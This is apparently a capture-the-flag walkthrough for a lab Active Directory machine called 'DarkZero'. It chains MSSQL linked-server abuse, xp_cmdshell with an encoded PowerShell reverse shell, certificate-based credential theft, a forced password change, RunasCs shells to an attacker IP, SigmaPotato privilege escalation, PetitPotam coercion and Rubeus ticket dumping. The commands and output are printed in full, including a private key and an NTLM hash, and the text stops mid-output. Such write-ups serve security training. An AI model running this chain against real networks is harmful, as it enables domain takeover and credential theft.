Reconnaissance
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-18 20:30:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-18T20:30:16
|_Not valid after: 2055-11-18T20:30:16
| ms-sql-ntlm-info:
| 10.129.219.186:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-11-18T20:32:23+00:00; +7h00m00s from scanner time.
| ms-sql-info:
| 10.129.219.186:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49893/tcp open msrpc Microsoft Windows RPC
49918/tcp open msrpc Microsoft Windows RPC
60501/tcp open msrpc Microsoft Windows RPC
60517/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2025-11-18T20:31:45
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
For the most part the ports are common for a Domain Controller, but there’s also MSSQL. The nmap scan already found the domain darkzero.htb and the hostname DC01, so they both go into my /etc/hosts file.
Initial Access
As is common in real life pentests, you will start the DarkZero box with credentials for the following account
john.w:RFulUtONCOL!
Privilege Escalation
The provided credentials let me access MSSQL as guest and checking the configured links returns a connection to dc02.darkzero.ext as dc01_sql_svc. After I activate the link and enumerate the logins I can see that I’m already running as sysadmin and a reverse shell with xp_cmdshell is just one command away.
$ impacket-mssqlclient -windows-auth DARKZERO.HTB/john.w:'RFulUtONCOL!'@dc01.darkzero.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
SQL (darkzero\john.w guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
----------------- --------------- --------------- ------------
DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svc
SQL (darkzero\john.w guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
--------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 1 1 0 0 0 0 0 0 0
##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
darkzero-ext\Domain Admins WINDOWS_GROUP 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT Service\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
dc01_sql_svc SQL_LOGIN 0 1 0 0 0 0 0 0 0
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enable_xp_cmdshell
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell powershell -e JABjAGw<SNIP>SYSTEM on DC02
After upgrading my shell to a sliver session I start enumerating. The user svc_sql does not have any interesting privileges enabled, but should have according to the Policy_Backup.inf found in the root of the C drive.
cat Policy_Backup.inf
--- SNIP ---
[Privilege Rights]
SeNetworkLogonRight = *S-1-1-0,*S-1-5-11,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-9
SeMachineAccountPrivilege = *S-1-5-11
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-11,*S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeSystemtimePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549
SeAuditPrivilege = *S-1-5-19,*S-1-5-20
SeIncreaseQuotaPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeIncreaseBasePriorityPrivilege = *S-1-5-32-544,*S-1-5-90-0
SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550
SeBatchLogonRight = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-559
SeServiceLogonRight = *S-1-5-20,svc_sql,SQLServer2005SQLBrowserUser$DC02,*S-1-5-80-0,*S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-548,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551,*S-1-5-9
SeSecurityPrivilege = *S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-32-544,*S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
SeManageVolumePrivilege = *S-1-5-32-544
SeRemoteInteractiveLogonRight = *S-1-5-32-544
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeCreateGlobalPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeIncreaseWorkingSetPrivilege = *S-1-5-32-545
SeTimeZonePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549
SeCreateSymbolicLinkPrivilege = *S-1-5-32-544
SeDelegateSessionUserImpersonatePrivilege = *S-1-5-32-544
--- SNIP ---The goal is to get the password of svc_sql and then use it to get a new, more privileged, session with logon type 5. I try to accomplish that by requesting a new certificate within the current session and then use that to authenticate. First I run Certify with find to list the available CAs and the templates and then request one with the User template.
sliver (darkzero) > certify -- find
[*] certify output:
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=darkzero,DC=ext'
[*] Listing info about the Enterprise CA 'darkzero-ext-DC02-CA'
Enterprise CA Name : darkzero-ext-DC02-CA
DNS Hostname : DC02.darkzero.ext
FullName : DC02.darkzero.ext\darkzero-ext-DC02-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=darkzero-ext-DC02-CA, DC=darkzero, DC=ext
Cert Thumbprint : 56B26E2CB5DD40283F32A80A07D637782F557F95
Cert Serial : 1643389103EC9DA6407DCE3E015ECD07
Cert Start Date : 7/29/2025 7:17:46 AM
Cert End Date : 7/29/2035 7:27:43 AM
Cert Chain : CN=darkzero-ext-DC02-CA,DC=darkzero,DC=ext
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
Allow ManageCA, ManageCertificates darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
Enrollment Agent Restrictions : None
[*] Available Certificates Templates :
CA Name : DC02.darkzero.ext\darkzero-ext-DC02-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
darkzero-ext\Domain Users S-1-5-21-1969715525-31638512-2552845157-513
darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
Object Control Permissions
Owner : darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
WriteOwner Principals : darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
WriteDacl Principals : darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
WriteProperty Principals : darkzero-ext\Domain Admins S-1-5-21-1969715525-31638512-2552845157-512
darkzero-ext\Enterprise AdminsS-1-5-21-1969715525-31638512-2552845157-519
--- SNIP ---
sliver (darkzero) > certify -- request /ca:DC02\\darkzero-ext-DC02-CA /template:User
[*] certify output:
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : darkzero-ext\svc_sql
[*] No subject name specified, using current context as subject.
[*] Template : User
[*] Subject : CN=svc_sql, CN=Users, DC=darkzero, DC=ext
[*] Certificate Authority : DC02\darkzero-ext-DC02-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 3
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAuUp1moQ0O/BuCH0y2gtTU2ly3pelHQk+0q4z+9iq9MlPCn6o
fED5RoLuaw7TuFWrOyUyQ4+Ytjhz2X/UAqmSgDj78llnIyzaAJ3aoNA0d2oxvWUl
KzGs3F0nEchr+L/qMo90lZ1jlSbZsVZBcVlcUsQq4ihE2PGiRmCUZbmEk5tgbL/0
UWKU1ypyFN94hK/xfVyzk37uHTlDW1/6q1muvH120Ia2TN7YWb/TE5Kj+74Ns9Od
ONaKKQt/5MHmGRhJTuyOofLZjAuFCe66JQDZQ510NXuodW63db/CYEiRzcgEmZyj
88laCSMbImC/pRHJ50hvIKCp60aCSg8jPE9fpQIDAQABAoIBAQCgzFdm8pgJ9Erp
Hw2EYBO97WL8fQmTOzTDzN3cD1m8+P6ZEvXQbuplILcbPVDLRb1FpLAMJY/XgwI2
nFI2xUYX9FvhI2j4A7JkmpjiugzuHMBxplctNvzWeBixvAbHZnUtz4TTWjTTeVWu
Kja80VnnkcnNXjjxNDEpdiMSbH77QHz11+2JkaaK5XVnCC0VH0g2ShwrpARbclUp
TQKZW9G0BGzhtkTS8HQYAJdikstZIIkc2pns4SC1R6UmWVe3SPwv07gxxX1SPEID
6+083QUXfaPQDORX58GTABzU/3dLopY+ahAjOMam2Vz/zLaCShCvhW4uUQZkYTzp
9+9Aw3h5AoGBAPZlMEHz0VWttsFdf8NTSy8tTZ9Vt570djdvNxazoVDWggGX2yly
MDouywK48iZ5R45j9nCbCMAUCzABBeMAD1qMTO1U8OPFOoyrzV47Sfcc0pwVsMnt
sllmrbDTWn0Fs+L4r13CTE1otXunKWByAprQ8A+v5ZhekkGN7KoUeSibAoGBAMCD
gHMUyXdHt8PH9UW86RQjFzcSk014HVQWR+5azqbfSK9gP5CFkW10OTCFXDwZTo/Q
569+uRX4VgxvWYj4EKsF2oOvcyjm+X9m+IvPmO7J3eMpl8UmJAzF79VWduN/aYKf
30g0PTSG3Ihd9b5JbXYSniInSLn35+TAnTAZLXy/AoGALBm8Y3GSXDV1anKjtYAp
Cs6fAA/Fh8vVhOKBB60rCF78cfCOJ4Lqot9RMrGLldtLNW8q4si87jQoNHVaamDO
XrSR6EC1xO6+JgNyBJW0DWi5QXqYY+wJafr4x5dssMfehJdiO/PU2F4PbYxj2YFO
egs/jG89NuJmZxlR7LcxYFUCgYBV2o9vQybxzgcTBdrJZg0gEOIqilss4lNaC7G6
h76/RraYl7jhT9/iS0Gx9NeEadjSZFzetAoA1UYyt3nbjp2IV8zyi001QYSlH5va
ZhOS8m3E/+iSYIcVNzTVFIFixZCdU4T1I27kPPyeyCBu4zowvO7O1mwlm3xMVOYE
7EWP6wKBgE+Kipttjyx00i9vXNwZsdoNplZ1jkGmQfjaM53Yq/140blvC99iyMRK
cVTla6dUKVTxWbU7NzDaT4+MMy7Vnr5dMp3OxSaYFGIvVhzc8kSepOPNMC2K9wT5
YoXGeTcpG3Oa9NkGCM2H9GFr4PoXMmKsJjCM51XHP4Y3MnQ6i/im
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIHKTCCBRGgAwIBAgITaQAAAAOK7Vq2GNJwmAAAAAAAAzANBgkqhkiG9w0BAQsF
ADBOMRMwEQYKCZImiZPyLGQBGRYDZXh0MRgwFgYKCZImiZPyLGQBGRYIZGFya3pl
cm8xHTAbBgNVBAMTFGRhcmt6ZXJvLWV4dC1EQzAyLUNBMB4XDTI1MTExODIyMTEw
MFoXDTI2MTExODIyMTEwMFowUTETMBEGCgmSJomT8ixkARkWA2V4dDEYMBYGCgmS
JomT8ixkARkWCGRhcmt6ZXJvMQ4wDAYDVQQDEwVVc2VyczEQMA4GA1UEAwwHc3Zj
X3NxbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALlKdZqENDvwbgh9
MtoLU1Npct6XpR0JPtKuM/vYqvTJTwp+qHxA+UaC7msO07hVqzslMkOPmLY4c9l/
1AKpkoA4+/JZZyMs2gCd2qDQNHdqMb1lJSsxrNxdJxHIa/i/6jKPdJWdY5Um2bFW
QXFZXFLEKuIoRNjxokZglGW5hJObYGy/9FFilNcqchTfeISv8X1cs5N+7h05Q1tf
+qtZrrx9dtCGtkze2Fm/0xOSo/u+DbPTnTjWiikLf+TB5hkYSU7sjqHy2YwLhQnu
uiUA2UOddDV7qHVut3W/wmBIkc3IBJmco/PJWgkjGyJgv6URyedIbyCgqetGgkoP
IzxPX6UCAwEAAaOCAvswggL3MBcGCSsGAQQBgjcUAgQKHggAVQBzAGUAcjApBgNV
HSUEIjAgBgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQH/
BAQDAgWgMEQGCSqGSIb3DQEJDwQ3MDUwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
DQMEAgIAgDAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUmUhe/gU+3Mom
nBzQWtKSlJGxohcwHwYDVR0jBBgwFoAU1Rl+LJBmS8zfG6d+AhLydWFBqowwgdAG
A1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6Ly8vQ049ZGFya3plcm8tZXh0LURD
MDItQ0EsQ049REMwMixDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1kYXJremVybyxEQz1leHQ/
Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERp
c3RyaWJ1dGlvblBvaW50MIHHBggrBgEFBQcBAQSBujCBtzCBtAYIKwYBBQUHMAKG
gadsZGFwOi8vL0NOPWRhcmt6ZXJvLWV4dC1EQzAyLUNBLENOPUFJQSxDTj1QdWJs
aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u
LERDPWRhcmt6ZXJvLERDPWV4dD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xh
c3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAvBgNVHREEKDAmoCQGCisGAQQBgjcU
AgOgFgwUc3ZjX3NxbEBkYXJremVyby5leHQwTQYJKwYBBAGCNxkCBEAwPqA8Bgor
BgEEAYI3GQIBoC4ELFMtMS01LTIxLTE5Njk3MTU1MjUtMzE2Mzg1MTItMjU1Mjg0
NTE1Ny0xMTAzMA0GCSqGSIb3DQEBCwUAA4ICAQAtw1jvh+NkgGJAwMLOH+XQjRxU
6iX4aPSXG5jrn5f3l+wJPeO8TygbRmSRgtX0Dod1vD3xKsHU2GYxGJSo7tZCEeVE
XMbNhYxVSs7gdz7YkewZI2zp2Zmp77GeTJZdiIZplXwyRHgZjJinPoRImkaS94Ox
ZqJDJAAcP33VTMun38ltZ/pHn8gXJPOecCvVvH9joeMTG6c3Lm3rE5Ab24/wddXE
/fko+oC4gHxE4Js4Q+vc5x9ojcOwad4h5f2X1BE206TIsyPSDMiAmDT05JIQDs2F
Ve7rnNGwySAbTMrZ9cnvc1xkW6JzyNRoaV57hOew2FCKEMyN+jL3gtkVcYING6JO
HKRFJ06erOZ0LVI9H3oFHkzs+apRHmqF93wt4YwM/6MrJ04BvNW/TeMnPa0R47wl
P/UslrPcrsJL9vUmtPrA2YpSAeg5e7Ii6Uurgu1dES+990aJhXFssP6d8je5X+fj
zVT89kOM2tyP73KeZNyA7DgLMiwefhf41PoHBeWrVSKYjoq4kfRBR1z8BTTQJvQS
+kFN7MQGkvhgKQA8uX0NGlUataRoGcAq9mvnGGy5XVFui/Xzb2wskelcD8pXwK/+
zidXw3aEyyy71Otmq2ix+b1kSZnP6uupb9LBLx67MLRZ64s/35L4BQcGiFYDLKJO
Owy3JBWUMlQheBiPOQ==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxFor me to access the DC02 with other tools, I start chisel with chisel client 10.10.10.10:1337 R:socks in my sliver session to open a SOCKS proxy. Then after converting the base64 encoded certificate into a PFX file, I can use it to authenticate to with certipy-ad. Conveniently this prints the NTLM hash for the account and I can use this to set the password to a known value with smbpasswd.
$ proxychains -q faketime -f +7h certipy-ad auth -pfx cert.pfx -dc-ip 127.0.0.1
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'svc_sql@darkzero.ext'
[*] Security Extension SID: 'S-1-5-21-1969715525-31638512-2552845157-1103'
[*] Using principal: 'svc_sql@darkzero.ext'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'svc_sql.ccache'
[*] Wrote credential cache to 'svc_sql.ccache'
[*] Trying to retrieve NT hash for 'svc_sql'
[*] Got hash for 'svc_sql@darkzero.ext': aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f
$ proxychains -q impacket-changepasswd -hashes :816ccb849956b531db139346751db65f \
-newpass 'Helloworld123!' \
DARKZERO.EXT/svc_sql@dc02.darkzero.ext
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of DARKZERO.EXT\svc_sql
[*] Connecting to DCE/RPC as DARKZERO.EXT\svc_sql
[*] Password was changed successfully.By executing RunasCs with the credentials for svc_sql and specifying Logon Type 5 I get another reverse shell as that user.
sliver (darkzero) > execute-assembly -t 15 -- RunasCs.exe svc_sql Helloworld123! -l 5 --bypass-uac powershell -r 10.10.10.10:4444
[*] Output:
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-612be$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 1900 created in background.This time the SeImpersonate privilege is enabled and I can proceed to escalate privileges. I therefore create new user and add it to the Administrators group. Through the SOCKS proxy I authenticate and get a new shell with high privileges before I upgrade this to a SYSTEM shell with SigmaPotato.
sliver (darkzero) > getprivs
Privilege Information for svchost.exe (PID: 3692)
-------------------------------------------------
Process Integrity Level: High
Name Description Attributes
==== =========== ==========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled, Enabled by Default
SeImpersonatePrivilege Impersonate a client after authentication Enabled, Enabled by Default
SeCreateGlobalPrivilege Create global objects Enabled, Enabled by Default
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
sliver (darkzero) > execute-assembly -t 15 -- SigmaPotato.exe '"net user /add ryuki Helloworld123!"'
sliver (darkzero) > execute-assembly -t 15 -- SigmaPotato.exe '"net localgroup administrators ryuki /add"'Administrator on DC01
With SYSTEM privileges on DC02 I can dump all the Kerberos tickets on the system. If I can coerce DC01 into authenticating, its ticket will be cached as well, even just for a short time. Through nxc and the credentials of john.w I try to use PetitPotam and the tool reports success.
$ nxc smb dc01.darkzero.htb -u john.w \
-p 'RFulUtONCOL!' \
-M coerce_plus \
-o METHOD=PetitPotam LISTENER=dc02.darkzero.ext
SMB 10.129.1.21 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.1.21 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
COERCE_PLUS 10.129.1.21 445 DC01 VULNERABLE, PetitPotam
COERCE_PLUS 10.129.1.21 445 DC01 Exploit Success, efsrpc\EfsRpcAddUsersToFile
Running rubeus triage on DC02 lists the ticket from DC01$ and I can proceed to dump it via rubeus dump.
sliver (darkzero) > rubeus -- triage
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
Action: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x3e7
----------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
----------------------------------------------------------------------------------------------------------
| 0x1730ca | DC01$ @ DARKZERO.HTB | krbtgt/DARKZERO.HTB | 11/18/2025 11:50:38 PM |
| 0x7b33d | DC02$ @ DARKZERO.EXT | LDAP/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x7b294 | DC02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x7b1f1 | DC02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x73b81 | Administrator @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/18/2025 11:56:35 PM |
| 0x608af | DC02$ @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/18/2025 11:51:41 PM |
| 0x5a585 | DC02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e4 | dc02$ @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/19/2025 12:51:13 AM |
| 0x3e4 | dc02$ @ DARKZERO.EXT | DNS/dc02.darkzero.ext | 11/19/2025 12:51:13 AM |
| 0x14b8ea | Administrator @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/19/2025 1:35:20 AM |
| 0x111f1c | Administrator @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/19/2025 1:05:20 AM |
| 0xa5f0d | DC02$ @ DARKZERO.EXT | GC/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x7bcc7 | DC02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x612be | svc_sql @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/18/2025 11:53:17 PM |
| 0x5bf5c | DC02$ @ DARKZERO.EXT | LDAP/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | krbtgt/DARKZERO.HTB | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | GC/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | ldap/dc01.darkzero.htb/darkzero.htb | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | cifs/DC02 | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | DC02$ | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | cifs/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | LDAP/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | LDAP/DC02 | 11/18/2025 11:51:41 PM |
----------------------------------------------------------------------------------------------------------
sliver (darkzero) > rubeus -- dump /nowrap /user:DC01$
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
Action: Dump Kerberos Ticket Data (All Users)
[*] Target user : DC01$
[*] Current LUID : 0x3e7
UserName : DC01$
Domain : darkzero
LogonId : 0x1730ca
UserSID : S-1-5-21-1152179935-589108180-1989892463-1000
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 11/18/2025 3:55:43 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.HTB
UserPrincipalName :
ServiceName : krbtgt/DARKZERO.HTB
